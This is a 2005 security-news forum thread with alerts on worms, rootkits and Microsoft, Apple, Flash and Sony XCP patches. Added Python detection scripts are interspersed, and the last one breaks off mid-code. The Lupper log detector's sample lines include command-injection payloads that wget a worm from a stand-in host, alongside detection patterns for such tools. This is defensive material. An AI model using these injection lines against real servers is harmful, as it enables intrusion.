I don’t think this one is widespread, but based on the stealth-like nature of rootkits, it’s probably both difficult to detect and remove.
http://news.zdnet.com/2100-1009_22-5920403.html
A worm found spreading via America Online’s Instant Messenger is carrying a nastier punch than usual, a security company has warned. The unnamed worm delivers a cocktail of unwanted software, including a so-called rootkit, security experts at FaceTime Communications said Friday. A rootkit is a tool designed to go undetected by the security software used to lock down control of a computer after an initial hack.
-
October 31, 2005 at 2:31 pm #3114220
phpBB 2.0.18 – Special Halloween release has security improvements
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Forum Administrators should move to the latest versions of phpBB, as security improvements continue to be made to this highly flexible and functional environment.
http://www.phpbb.com/phpBB/viewtopic.php?t=336756
The phpBB Group is pleased to announce the release of phpBB 2.0.18, “The Halloween Special” release. This is a major update to the 2.0.x codebase and includes fixes for numerous bugs reported by users to our Bug Tracker, as well as updates to those issues identified by the recent security audit of the code and a couple of security issues reported to us. In addition we have backported a further feature from our “Olympus” codebase to change the way automatic logins are handled.
-
November 1, 2005 at 6:34 am #3114964
Apple Computers release Mac OS X security updates
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Apple Computers has issued some important security updates that should be applied promptly to ensure a more secure computing environment.
http://isc.sans.org/diary.php?storyid=811
Apple has released security updates for OS X, the new version 10.4.3 addresses issues in Finder, Software Update, memberd, Keychain and Kernel. It’s time for the Mac folks to patch the boxes….
OS X 10.4.3 can be downloaded from http://www.apple.com/support/downloads/
-
November 1, 2005 at 2:32 pm #3116748
Bagle DL/DK – Two New November Variants
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Usually, early in the month the Bagle author launches the next generation of variants. McAfee has just published preliminary information on this.
Bagle DL/DK – Two New November Variants
http://secunia.com/virus_information/23094/bagle.dl/
http://secunia.com/virus_information/23093/bagle.dk/
QUOTE: This is a downloader trojan. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and may use any one of the following filenames:
The_new_prices.zip
Info_Prices.zip
Health_and_knowledge.zip
sms_text.zip
max.zip
Business.zip
Business_dealing.zip
-
November 2, 2005 at 6:32 am #3116550
Spybot.ZIF – May report vulnerable CISCO routers to hackers
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Spybot is commonly used by hackers, as it tries multiple approaches to find weaknesses in the security defenses, including both Microsoft and non-Microsoft vulnerabilities. Thus, it’s important to patch everything, including CISCO routers, as this new variant has the potential to report vulnerable ones back to these malicious groups of individuals.
Spybot.ZIF – Internet Storm Center Link
W32.Spybot.ZIF is a network-aware worm that opens a back door on the compromised computer. It spreads by exploiting common system vulnerabilities.
METHODS OF INFECTION
The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (described in Microsoft Security Bulletin MS03-026).
The Microsoft Windows Local Security Authority Service Remote Buffer Overflow (as described in Microsoft Security Bulletin MS04-011).
The Microsoft Windows ntdll.dll Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS03-007).
The Microsoft ASN.1 Library Bit String Processing Variant Heap Corruption (described in Microsoft Security Bulletin MS04-007).
The Workstation Service Buffer Overrun vulnerability (as described in Microsoft Security Bulletin MS03-049).
The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039).
The DameWare Mini Remote Control Server Pre-Authentication Buffer Overflow vulnerability (as described in Bugtraq ID 9213).
The VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability (as described here).
EXISTING BACKDOORS: Spreads to computers compromised by the following threats: Backdoor.SubSeven, Backdoor.NetDevil, W32.MyDoom, W32.Beagle, Backdoor.Optix
Exploits weak username/passwords to spread over network shares and to the Microsoft SQL server environment
SYMPTOMS & ATTACK METHODS
Opens a back door by contacting an IRC server on the domain scv.unixirc.de, through TCP port 6667. This back door allows a remote attacker to perform the following actions on the compromised computer:
Start and stop threads and processes:
Start a SOCKS4 server
Start an HTTP server
Start an FTP server
Retrieve clipboard data
Sniff local network traffic
Run shell commands
Change IE start page
Flush DNS/ARP cache
Steal passwords from protected storage
Open and delete files
Download and execute files
Perform a denial of service (DOS) attack
View and delete registry keys
Obtain computer information such as CPU type, OS version, RAM, etc
Scan a specified network range for Cisco routers that may have vulnerable Telnet or HTTP servers running and report results back to IRC.
-
November 8, 2005 at 1:08 pm #3135807
MS05-052: Resolution posted for web pages that don’t load properly
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft offers much improved security in XP SP2 for Internet Explorer and applying the latest tightening of controls can break some applications and web pages that may not be following the best practices. This manual regedit based fix can help resolve these issues.
SYMPTOMS
After you install cumulative security update 896688, a Web page that contains an ActiveX control does not load as expected in the products that are listed in the “Applies to” section. You may also receive an error message that is similar to the following when you try to open Add/Remove Programs in Control Panel:
Object doesn’t support this property or method
RESOLUTION
To resolve this issue, add the required subkeys to the registry. To do this, follow these steps:
1. Click Start, click Run, type Notepad.exe, and then click OK.
2. Paste the following text in the Notepad document:
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}]
@="ClassMoniker"

[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}\InprocServer32]
@="ole32.dll"

[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}\ProgID]
@="clsid"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\CLSID]
@="{0000031A-0000-0000-C000-000000000046}"
3. Click File, and then click Save.
4. In the Save in box, click Desktop.
5. In the File name box, type KB909889.reg.
6. In the Save as type box, click All Files, and then click Save.
7. Click File, and then click Exit.
8. On the desktop, double-click KB909889.reg, and then click Yes to add the information to the registry.
9. Click OK to confirm that the information in the KB909889.reg file has been added to the registry.
10. Restart the computer.
Important: This article contains information that shows you how to help lower security settings or how to turn off security features on a computer. You can make these changes to work around a specific problem. Before you make these changes, we recommend that you evaluate the risks that are associated with implementing this workaround in your particular environment. If you implement this workaround, take any appropriate additional steps to help protect your system.
-
November 8, 2005 at 1:08 pm #3135808
Macromedia Flash Player – Patch information for Critical Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Macromedia has performed a security update for its Flash Player to improve security, including a critical vulnerability that can be exploited by visiting a malicious web page or opening a specially crafted email attachment. Everyone using this software should update as quickly as possible.
Macromedia Flash Player Remote Command Execution Vulnerability
Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-11-05
Technical Description: A critical vulnerability has been identified in Macromedia Flash Player, which may be exploited by remote attackers to execute arbitrary commands. This issue is due to a memory corruption error in “Flash.ocx” when using frame type identifiers read from malformed SWF files as indexes of certain arrays, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted HTML Web page or open a malicious Flash file.
Affected Products: Macromedia Flash Player 7.0.19.0 and prior
Solution: Upgrade to Flash Player 8 version 8.0.22.0 or Flash Player 7 versions 7.0.60.0 or 7.0.61.0.
-
November 8, 2005 at 1:08 pm #3135809
Lupper Internet Worm – affects Linux/PHP environment
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new Linux based Internet worm is starting to spread. More information is noted below
Lupper Internet Worm – Key Links
http://vil.nai.com/vil/content/v_136821.htm
http://secunia.com/virus_information/23339/
This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts. It is a modified derivative of the Linux/Slapper and BSD/Scalper worms from which it inherits the propagation strategy. It scans an entire class B subnet created by randomly choosing the first byte from a hard-coded list of A classes and randomly generating the second byte.
The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
Like its precedents, the infected computers form a global network of compromised servers based on peer to peer communication principles. This network can be used, for example, for Distributed Denial of Service (DDoS) attacks or other purposes because it can accept remote commands. It is also capable of harvesting email addresses stored in files on the web server.
Symptoms
Presence of the following file: /tmp/lupii
Ports Used: UDP 7111, UDP 7222
Sends HTTP requests to the URLs it generates, and attempts to spread by exploiting the following Web server-related vulnerabilities:
- The XML-RPC for PHP Remote Code Injection vulnerability (as described in Bugtraq ID 14088)
- The AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability (as described in Bugtraq ID 10950)
- The Darryl Burgdorf Webhints Remote Command Execution Vulnerability (as described in Bugtraq ID 13930)
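Because Lupper spreads by firing blind HTTP requests at a handful of script URLs, its probes leave a recognisable trail in web server access logs. The following is an added example, not code from the original post or from any vendor: it parses Apache combined-format log lines and flags requests that match the three propagation vectors listed above (a POST to xmlrpc.php, an awstats.pl request whose configdir parameter carries shell metacharacters, and a hints.pl request with shell metacharacters in its query). The script file names, the metacharacter list and the sample log lines are assumptions constructed for this example, not captured traffic.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Script names targeted by the three vulnerabilities named in the post.
# The file names are assumed for this example; only the Bugtraq IDs come from the post.
TARGET_SCRIPTS = {
    "xmlrpc.php": "XML-RPC for PHP (BID 14088)",
    "awstats.pl": "AWStats rawlog/configdir (BID 10950)",
    "hints.pl":   "Webhints (BID 13930)",
}

# Shell metacharacters and fetch-and-run hints typical of CGI command injection (assumed list).
SHELL_META = re.compile(r"[|;`$]|%0a|\bwget\b|\bcurl\b|/tmp/", re.IGNORECASE)

def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def query_params(query):
    """Split a raw query string into {name: decoded value}.
    Done by hand so that ';' inside a value is kept rather than treated as a separator."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote(name)] = unquote(value)
    return params

def classify(entry):
    """Return a reason string if the request looks like a Lupper-style probe, else None."""
    parts = urlsplit(entry["url"])
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in TARGET_SCRIPTS:
        return None
    decoded = unquote(parts.query)
    params = query_params(parts.query)
    if script == "awstats.pl" and "configdir" in params and SHELL_META.search(params["configdir"]):
        return "command injection via configdir: " + TARGET_SCRIPTS[script]
    if script == "hints.pl" and SHELL_META.search(decoded):
        return "shell metacharacters in query: " + TARGET_SCRIPTS[script]
    if script == "xmlrpc.php" and entry["method"] == "POST":
        return "POST to xmlrpc.php: " + TARGET_SCRIPTS[script]
    return None

def scan(lines):
    """Run classify() over every parseable line; return [(client_ip, url, reason)]."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append((entry["ip"], entry["url"], reason))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Nov/2005:10:01:02 -0500] "GET /index.html HTTP/1.1" 200 1234',
    '192.0.2.7 - - [08/Nov/2005:10:01:09 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;wget%20http://192.0.2.9/lupii%20-O%20/tmp/lupii| HTTP/1.0" 404 210',
    '192.0.2.7 - - [08/Nov/2005:10:01:10 -0500] "POST /xmlrpc.php HTTP/1.0" 200 510',
    '192.0.2.7 - - [08/Nov/2005:10:01:11 -0500] "GET /cgi-bin/hints.pl?text=%3Bwget+http://192.0.2.9/lupii HTTP/1.0" 404 210',
    '10.0.0.8 - - [08/Nov/2005:10:02:00 -0500] "GET /cgi-bin/awstats/awstats.pl?config=site HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    for ip, url, reason in scan(SAMPLE_LOG):
        print(ip, reason, url)
```

The xmlrpc.php rule is deliberately coarse (any POST), so on a server that legitimately serves XML-RPC it should be correlated with the other symptoms the post lists (the /tmp/lupii file and UDP ports 7111/7222) rather than treated as proof on its own.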
-
November 8, 2005 at 1:08 pm #3135804
Microsoft Patch Tuesday – 11/8/2005 One critical update scheduled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Sharing planning info for the standard 2nd Tuesday of the month updates from Microsoft
Quote: On 8 November 2005 Microsoft is planning to release: Security Updates
•1 Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for this is Critical. These updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
Microsoft Windows Malicious Software Removal Tool
•Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).
Non-security High Priority updates on MU, WU, WSUS and SUS:
•Microsoft will release two NON-SECURITY High-Priority Updates on Microsoft Update (MU), and Windows Server Update Services (WSUS).
•Microsoft will release one NON-SECURITY High-Priority Update on Windows Update (WU), and Software Update Services (SUS).
-
November 8, 2005 at 1:08 pm #3135805
Article: Windows Rootkits an in-depth analysis by SecurityFocus
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This article was published by Security Focus and provides a good description of this threat and how it works in detail.
Article: Windows Rootkits an in-depth analysis by SecurityFocus
In 2005, the bar has been raised in the arena of malicious software. This has never before been more evident than in the recent deployments of Windows rootkit technology within some of the latest viruses, worms, spyware, adware, and more. It has become increasingly important to understand what this threat is and what can be done to detect malicious use.
-
November 8, 2005 at 1:08 pm #3135806
Microsoft launches Windows Live Safety Center beta
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft has launched a new online version of their full anti-virus scanner that can be used to double check other installed products. This new facility also provides disk cleanup and defragmentation controls from an easy to use menu approach. This is a beta product, so use it carefully. So far in early testing, it has worked accurately for me.
Microsoft launches Windows Live Safety Center beta
Windows Live Safety Center is a new, free service designed to help ensure the health of your PC.
* Check for and remove viruses
* Learn about threats
* Improve your PC’s performance
* Get rid of junk on your hard disk
Use the full service scan to check everything, or turn to the scanners and information in the service centers to meet your specific needs.
-
November 9, 2005 at 6:32 am #3120348
Microsoft Security Updates – November 2005
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One critical update for Windows was issued by Microsoft during November 2005. The MS05-053 security update fixes vulnerabilities associated with heap overflow errors when malformed Windows Metafile (WMF) and Enhanced Metafile (EMF) images are processed. All Windows systems should be patched expediently as reverse engineering and the development of exploits are likely.
Microsoft Security Bulletin MS05-053: Vulnerabilities in Graphics Rendering Engine Could Allow Code Execution (896424)
PATCHES THESE THREE VULNERABILITIES
Graphics Rendering Engine – CAN-2005-2123: A remote code execution vulnerability exists in the rendering of Windows Metafile (WMF) and Enhanced Metafile (EMF) image formats that could allow remote code execution on an affected system. Any program that renders WMF or EMF images on the affected systems could be vulnerable to this attack. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Windows Metafile Vulnerability – CAN-2005-2124: A remote code execution vulnerability exists in the rendering of Windows Metafile (WMF) image format that could allow remote code execution on an affected system. Any program that renders WMF images on the affected systems could be vulnerable to this attack. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Enhanced Metafile Vulnerability – CAN-2005-0803: A denial of service vulnerability exists in the rendering of Enhanced Metafile (EMF) image format that could allow any program that renders EMF images to be vulnerable to attack. An attacker who successfully exploited this vulnerability could cause the affected programs to stop responding.
AFFECTED PRODUCTS
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
OTHER REFERENCES
Microsoft Windows WMF/EMF File Handling Vulnerabilities
http://www.frsirt.com/english/advisories/2005/2348
MS05-053 – More Graphic Rendering Buffer Overflow Vulnerabilities
http://isc.sans.org/diary.php?storyid=831
-
November 9, 2005 at 2:32 pm #3119001
Malware Infections – “To rebuild or not to rebuild” that is the question?
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
SUMMARY: When a PC’s security, performance, and reliability are affected by a malware infection, damages can be so severe that rebuilding the PC is the only option. The need to reload the Operating system is usually based on the comfort level in cleaning malware infections. The most important factor is a proven removal tool which will provide assurances that all traces of the infection are gone.
REASONS TO CLEAN ONLY (AND NOT REBUILD)
As I’ve been actively helping folks clean malware for almost ten years now, you can remove most malware infections reliably if you have good cleaning tools. Most AV, spyware, and standalone cleaners not only remove the main malware driver routines, but they also clean up the associated registry entries and other Windows configuration settings allowing the PC to return to normal operations. If the malware infection is common, there should be good cleaning tools, so that it can be removed safely.
As an example, I have rarely seen the need to rebuild infected corporate PCs. One of my friends who is a lead technician, mentioned that only two out of hundreds cleaned in the past couple of years required a rebuild.
While corporate systems can be re-imaged quickly to base settings, it still takes some work to copy settings, My Documents, Favorites, etc., across for the user. The user also loses time in readjusting to the newly built system. They almost always lose some items plus they may be less productive for a few days.
On a home PC, a rebuild could be an even greater impact. The user needs to reload the operating system, the latest service packs, activate and register XP, and reinstall from backups. They must then install all Windows updates, plus perform security updates for every product they have on the system. There is also usually a loss of some items in this process.
REASONS TO REBUILD
Still, if someone is infected with a leading edge rootkit, virus, or advanced spyware infection, there may not be cleaning tools available. Thus, a rebuild might be in order to ensure this highly surreptitious malware still isn’t “phoning home” constantly.
Manually finding and repairing all the rootkit entries by hand could be risky and may not get everything as it should. As an example, about a year ago, I tried to manually remove (with REGEDIT) a new leading edge strain of spyware that was generating popups galore on a friend’s PC. Things worked great, until my friend rebooted and I soon learned that this advanced spyware product was dynamically creating registry entries on the fly.
Another key factor in the need to rebuild is multiple malware infections. When there is more than one infection present, the PC environment may remain unstable even after cleaning. This is because the cleaning tools can remove the malware, but they cannot fix permanent damages to the Windows registry or key system files. In these cases, you have no choice but to rebuild.
TEN THINGS TO DO AFTER YOU RECOVER FROM A MALWARE INFECTION
1. Stay up to date with Windows security (2nd Tuesday of month)
2. Stay up-to-date on all security patches for all other products (e.g., Office, Visual Studio, Firefox, Opera, Macromedia Flash, Real Player, Winamp, etc)
3. Use a good bi-directional firewall
4. Use a good anti-virus product
5. Use an anti-spyware product
6. Change your passwords (esp. if you had a backdoor, rootkit, keylogger, etc)
7. Use best practices – think before you click and think of all email attachments and links as being possibly dangerous — even if they come from a trusted source.
8. Run routine weekly scans for your system
9. Backup anything you don’t want to lose to DVD-R, CD-R, or FlashRAM sticks
10. Keep up with breaking news for emerging security risks
ADDITIONAL RESOURCES
-
December 20, 2005 at 4:12 pm #3196957
Malware Infections –
by black-eyed pea · about 18 years, 3 months ago
In reply to Malware Infections – “To rebuild or not to rebuild” that is the question?
I think if the resources exist, it is usually better to rebuild. In certain government entities, it is actually mandated. However, the feasibility of rebuilding every computer that gets infected is low. For example, tracking cookies show up in almost every spyware scan, but it makes sense to remove the tracking cookies rather than rebuild. I would like a definitive guide that rates how critical infections are, so that once a computer reaches a certain threshold, we would know it should be rebuilt.
I don’t know of any widely available antispyware application that is behavior based; therefore, the best tools at our disposal are signature-based. Any signature-based anti-malware application is only as good as its definitions. That is why system administrators and technicians who have had any experience with malware typically use 3-7 anti-malware apps.
There is no way for us to gauge how long undetected malware has sat undetected on any particular computer. I have scanned computers and removed malware only to come back a few days later with new definitions and find more. That is a frustrating thing, especially when it is a backdoor Trojan, keylogger, or rootkit. That is one reason it is better to rebuild.
Another reason rebuilding can make sense is that it takes several hours to run multiple anti-malware tools – with a fast machine, you can usually backup the user’s data and rebuild the machine faster. In our organization, we will have to upgrade computers to XP eventually, so if a Windows 2000 computer gets infected, it is an impetus to upgrade to XP/SP2.
-
-
November 11, 2005 at 5:47 am #3117515
MS05-053: TROJ_EMFSPLOIT.A in the wild
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Trend is reporting a trojan horse that might be the first example of a new exploit developed from the November security updates issued by Microsoft. Please update your systems with the latest security updates offered by Microsoft, as more developments could follow.
Internet Storm Center: TROJ_EMFSPLOIT.A in the wild
Trend Link: TROJ_EMFSPLOIT.A in the wild
Trend Micro is reporting a trojan in the wild (TROJ_EMFSPLOIT.A) that is exploiting the recent MS05-053 vulnerability announced on Tuesday. The trojan causes EXPLORER.EXE to crash, which isn’t so much fun for Windows users.
Upon execution, this Trojan causes the EXPLORER.EXE of affected machines to crash. It may also cause applications that attempt to load it to crash. An example of an application that can load EMF files is Internet Explorer. This Trojan runs on Windows 2000 Service Pack 4 and XP with no Service Pack.
-
November 14, 2005 at 9:48 am #3120016
Sober.T – Please be careful with ZIP email attachments
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
All Sober variants should be carefully watched. This new version is similar to past attacks and uses ZIP based attachments.
http://secunia.com/virus_information/23645/sober.t/
The Sober.T worm was found on November 14th, 2005. This Sober variant is similar to the previous ones – it sends itself as an attachment in e-mail messages with English or German texts. Sober.T worm sends e-mail messages with English and German texts and its file attached. The attachment is a ZIP archive containing the worm’s executable.
-
November 16, 2005 at 5:06 am #3130661
Sober virus – F-Secure declares medium risk on several new variants
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
There are now at least a half dozen new Sober variants that are circulating in the wild. F-Secure has declared medium risk on some of these. I’m getting some in my personal email, so it’s out there.
2005.11.15 Sober.T
2005.11.15 Sober.U
2005.11.15 Sober.V
2005.11.15 Sober.W
2005.11.15 Sober.X
2005.11.16 Sober.Z
EMAIL EXAMPLE:
Subject: Your eMail Password
Body: Thanks for your registration! Your registration will not be complete until you re-confirm it. Please read the following agreement. If you accept it, click the Accept to complete your registration!
Attachment: Accept_e-Text.zip
-
November 16, 2005 at 12:45 pm #3131708
Sony CD XCP Uninstallation ActiveX Vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
FrSIRT and Secunia have issued critical advisories for vulnerabilities associated with insecure techniques used in an ActiveX control for the Sony CD XCP based DRM controls.
Sony CD XCP Uninstallation ActiveX Vulnerabilities
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454
Multiple vulnerabilities were identified in Sony CD First4Internet XCP uninstallation ActiveX control, which could be exploited by attackers to execute arbitrary commands. These flaws are due to a design error in the “CodeSupport.ocx” ActiveX control that supports insecure methods, which could be exploited by remote attackers to compromise or reboot a vulnerable system by convincing a user to visit a specially crafted Web page.
Solution: Remove the ActiveX control from the system if it is installed, or set a kill bit for the “CodeSupport.ocx” ActiveX control (CLSID 4EA7C4C5-C5C0-4F5C-A008-8293505F71CC)
http://support.microsoft.com/kb/240797
Related Links
http://secunia.com/advisories/17408/
http://xforce.iss.net/xforce/alerts/id/208
http://cp.sonybmg.com/xcp/english/updates.html
-
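Both the MS05-052 workaround earlier in this thread (a .reg file merged from Notepad) and the kill-bit advice for the XCP CodeSupport.ocx control come down to writing specific registry keys, and in both cases you want to read the .reg text before merging it and confirm afterwards that the intended value is actually there. The following is an added example, not code from the original posts, from Microsoft or from Sony: it parses the text of a Windows Registry Editor 5.00 file (the format KB909889 uses), checks whether a given CLSID carries the kill bit (Compatibility Flags 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility, the KB240797 method), and produces the .reg text that sets that kill bit for the CLSID quoted above (written with braces, as the registry expects). It works on text only, so it runs anywhere; the sample .reg content is constructed, and only single-line string, dword and hex values are handled.

```python
import re

KILL_BIT = 0x400  # Compatibility Flags bit that stops IE loading the control (KB240797)
ACTIVEX_COMPAT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
# CLSID from the Secunia/FrSIRT advisories quoted above, in registry brace form.
XCP_CODESUPPORT_CLSID = "{4EA7C4C5-C5C0-4F5C-A008-8293505F71CC}"

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")

def _decode(data):
    """Decode one value's data: "string", dword:hex, hex:aa,bb (single line) or - (delete)."""
    if data.startswith('"'):
        return _unescape(data[1:-1])
    if data.startswith("dword:"):
        return int(data[6:], 16)
    if data.startswith("hex"):
        return bytes(int(b, 16) for b in data.split(":", 1)[1].split(",") if b)
    if data == "-":
        return None
    raise ValueError("unsupported value data: " + data)

def parse_reg(text):
    """Parse REGEDIT 5.00 text into {key_lower: {value_name_lower: value}}.
    The default value is stored under ''. A key written as [-Key] is recorded as None."""
    lines = text.lstrip().splitlines()
    if not lines or not lines[0].startswith("Windows Registry Editor Version 5.00"):
        raise ValueError("not a REGEDIT 5.00 file")
    keys, current = {}, None
    for raw in lines[1:]:
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        km = KEY_RE.match(line)
        if km:
            delete, keyname = km.groups()
            current = keyname.lower()
            keys[current] = None if delete else {}
            continue
        vm = VALUE_RE.match(line)
        if vm is None or current is None or keys[current] is None:
            raise ValueError("unexpected line: " + raw)
        name, data = vm.groups()
        name = "" if name == "@" else _unescape(name[1:-1])
        keys[current][name.lower()] = _decode(data)
    return keys

def is_killbitted(reg_text, clsid):
    """True if the .reg text sets the kill bit for clsid (comparison is case-insensitive)."""
    values = parse_reg(reg_text).get((ACTIVEX_COMPAT + "\\" + clsid).lower())
    if not values:
        return False
    flags = values.get("compatibility flags", 0)
    return isinstance(flags, int) and bool(flags & KILL_BIT)

def killbit_reg(clsid):
    """Produce .reg text that sets the kill bit for clsid."""
    return (
        "Windows Registry Editor Version 5.00\r\n\r\n"
        f"[{ACTIVEX_COMPAT}\\{clsid}]\r\n"
        f'"Compatibility Flags"=dword:{KILL_BIT:08x}\r\n'
    )

# Constructed sample: two of the KB909889 keys plus a kill bit for the XCP control.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\\CLSID\\{0000031A-0000-0000-C000-000000000046}]
@="ClassMoniker"

[HKEY_CLASSES_ROOT\\CLSID\\{0000031A-0000-0000-C000-000000000046}\\InprocServer32]
@="ole32.dll"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{4EA7C4C5-C5C0-4F5C-A008-8293505F71CC}]
"Compatibility Flags"=dword:00000400
"""

if __name__ == "__main__":
    print(is_killbitted(SAMPLE_REG, XCP_CODESUPPORT_CLSID))
    print(killbit_reg(XCP_CODESUPPORT_CLSID))
```

Reviewing a .reg file this way before double-clicking it is a cheap safeguard: the MS05-052 post's own warning notes that the same mechanism can just as easily lower security settings, and a kill bit set on the wrong CLSID silently disables a control you rely on.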
November 16, 2005 at 12:45 pm #3131707
New SdBot Internet worm variant – can install rootkit
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new version of the Sdbot Internet worm is circulating in the wild and it can install a rootkit.
W32/Sdbot.worm.gen.w64512
http://vil.nai.com/vil/content/v_136981.htm
http://secunia.com/virus_information/23740/
This worm bears the following characteristics:
* Propagates to machines with poorly secured network shares (weak username & password combinations) or accessible share (where local credentials are sufficient to write files to other systems)
* Propagates to MySQL and Microsoft SQL servers that are poorly secured (again weak username/password combinations)
* Propagates to remote machines by attempting to copy itself to a number of shares
* provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is available to the hacker)
* The worm appears to be Windows XP Service Pack 2 aware and makes several references to security features within the new Windows Security Center
* Drops a Rootkit on the compromised system (Detected as FUROOTKIT by current DATS).
It uses the following Exploits to propagate across vulnerable networks:
- MS04-007
- MS04-011
- MS05-039
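Spybot.ZIF (earlier in this thread) and this Sdbot variant behave the same way on the wire: they fan out across the local network trying RPC, SMB share and SQL logins with weak credentials, and the Spybot post notes the backdoor reports to an IRC server on TCP port 6667. Both behaviours can be picked out of ordinary connection logs. The following is an added example, not code from the original posts or from any vendor: it reads constructed connection records, raises an alert for an internal host opening an outbound TCP 6667 session, and raises a second alert when one internal host touches many distinct internal hosts on the share/SQL ports within a short window. The log format, the port-to-service table, the thresholds and the sample records are assumptions made for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

IRC_PORTS = {6667}
# Services the two posts say these worms spread over. Mapping to ports is an assumption of this example;
# the RPC/DCOM exploits named (MS03-026, MS04-011, MS05-039) reach their targets over 135/139/445.
SPREAD_PORTS = {135: "RPC/DCOM", 139: "NetBIOS session", 445: "SMB shares", 1433: "MS SQL", 3306: "MySQL"}
INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed internal range
FANOUT_THRESHOLD = 5                             # distinct hosts touched before we call it spreading
WINDOW = timedelta(minutes=2)

def parse_conn(line):
    """Constructed format: '2005-11-16T12:45:01 10.0.1.20 -> 10.0.1.77:445 tcp'."""
    ts, src, _, dst, proto = line.split()
    dst_ip, dport = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst_ip,
            "dport": int(dport), "proto": proto}

def detect(lines):
    """Return [(source_ip, reason)] for IRC egress and for share/SQL fan-out."""
    alerts = []
    per_src = defaultdict(list)   # src -> [(ts, dst, dport)] on spread ports
    for entry in map(parse_conn, lines):
        src_internal = ipaddress.ip_address(entry["src"]) in INTERNAL
        dst_internal = ipaddress.ip_address(entry["dst"]) in INTERNAL
        if src_internal and not dst_internal and entry["proto"] == "tcp" and entry["dport"] in IRC_PORTS:
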